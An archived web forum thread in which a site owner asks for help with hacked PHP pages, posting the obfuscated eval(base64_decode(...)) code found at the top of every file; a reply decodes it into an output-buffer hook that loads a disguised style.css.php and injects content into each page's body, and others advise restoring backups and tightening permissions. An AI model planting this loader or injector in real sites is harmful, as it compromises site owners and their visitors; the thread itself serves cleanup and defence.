Jump to content
Latest News: (loading..)

Archived

This topic is now archived and is closed to further replies.

ricardodacosta

I have been Hacked! Help Please!

Recommended Posts

I have this code at the top of all my pages:

 

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p

KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb250ZW50L3kvby9nL3lvZ

2ljY2hhaS9odG1sL2NhdGFsb2cveW9naWNjaGFpL2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvdGlueV

9tY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxlLmNzcy5waHA

nKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9jb250ZW50L3kvby9nL3lvZ2ljY2hhaS9odG1sL2NhdGFsb2cv

eW9naWNjaGFpL2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvdGlueV9tY2UvcGx1Z2lucy9pbmxpbmVwb

3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdH

MoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemR

lY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZCl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDsk

ZT0wO2lmKCRmJjQpeyRlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9MiskZ

Tt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMTYpeyRoPXN0cnBvcygkZC

xjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWY

oJHU9PT1GQUxTRSl7JHU9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0Nv

bnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJlZ19tYXRjaCgnL1w8Ym9ke

S9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbW

woKSwkYyk7fWVsc2V7cmV0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

 

1) What is it?

2) How was someone able to do that?

3) How can I deleted all at once without having to delete it from each file?

4) How can I prevent this for happening again?

 

Thank you for your help!

 

Ricardo

Share this post


Link to post
Share on other sites

What is it? it's nasty that's what .. the actual code is below: -

 

if ( function_exists('ob_start')&&!isset($GLOBALS['sh_no']) ){
 $GLOBALS['sh_no'] = 1;
 if( file_exists('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php') ){
include_once('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');
if( function_exists('gml') && !function_exists('dgobh') ){
  if( !function_exists('gzdecode')){
	function gzdecode($d){
	  $f=ord(substr($d,3,1));
	  $h=10;$e=0;
	  if($f&4){
		$e=unpack('v',substr($d,10,2));
		$e=$e[1];$h+=2+$e;
	  }
	  if($f&8){
		$h=strpos($d,chr(0),$h)+1;
	  }
	  if($f&16){
		$h=strpos($d,chr(0),$h)+1;
	  }
	  if($f&2){
		$h+=2;
	  }
	  $u = gzinflate(substr($d,$h));
	  if($u===FALSE){
		$u=$d;
	  }
	  return $u;
	}
  }
  function dgobh($b){
	Header('Content-Encoding: none');
	$c=gzdecode($b);
	if(preg_match('/\<body/si',$c)){
	  return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);
	} else {
	  return gml().$c;
	}
  }
  ob_start('dgobh');
}
 }
}

Share this post


Link to post
Share on other sites
What is it? it's nasty that's what .. the actual code is below: -

 

if ( function_exists('ob_start')&&!isset($GLOBALS['sh_no']) ){
 $GLOBALS['sh_no'] = 1;
 if( file_exists('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php') ){
include_once('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');
if( function_exists('gml') && !function_exists('dgobh') ){
  if( !function_exists('gzdecode')){
	function gzdecode($d){
	  $f=ord(substr($d,3,1));
	  $h=10;$e=0;
	  if($f&4){
		$e=unpack('v',substr($d,10,2));
		$e=$e[1];$h+=2+$e;
	  }
	  if($f&8){
		$h=strpos($d,chr(0),$h)+1;
	  }
	  if($f&16){
		$h=strpos($d,chr(0),$h)+1;
	  }
	  if($f&2){
		$h+=2;
	  }
	  $u = gzinflate(substr($d,$h));
	  if($u===FALSE){
		$u=$d;
	  }
	  return $u;
	}
  }
  function dgobh($b){
	Header('Content-Encoding: none');
	$c=gzdecode($b);
	if(preg_match('/\<body/si',$c)){
	  return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);
	} else {
	  return gml().$c;
	}
  }
  ob_start('dgobh');
}
 }
}

Robert thanks for your reply. Coul you tell me what to do now? Should I remove the inline popups file from the admin dir ? and then change my ftp password? any other suggestio will be greatly appreciated

Share this post


Link to post
Share on other sites

I need to know how to clean that F#$@$ code out of all my files? Is there a way to do it at once or do I have to go one by one and delete the code?

 

Should I installed Security Pro afterwards or before I start deleting the code just in case if it comes back again?

 

How was this hacker able to add that code to all my files?

Share this post


Link to post
Share on other sites

See the reasons in the links above for the most likely ways in.

 

Set right the permissions on files and directories.

 

Restore the site from a clean backup is the best solution or edit every file and remove the offending code


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

Usually people say that you have to install a clean backup (of the files) and because chances are that the hacker will come back you have to secure the site -afterwards!!

Share this post


Link to post
Share on other sites

Ok guys thank you for your help. I will upload the clean files from my back up and then add the Security Pro contribution as well as any other mentioned above.

 

Again Thanks!

Share this post


Link to post
Share on other sites

this infection does the following:

- adds a gifimg.php (or similarly named file) to most/all of your image directories

- adds a javascript function to many index.htm or index.html files on your site

- adds a javascript function to many .js files on your site.

 

FYI.

 

-jared

Share this post


Link to post
Share on other sites

×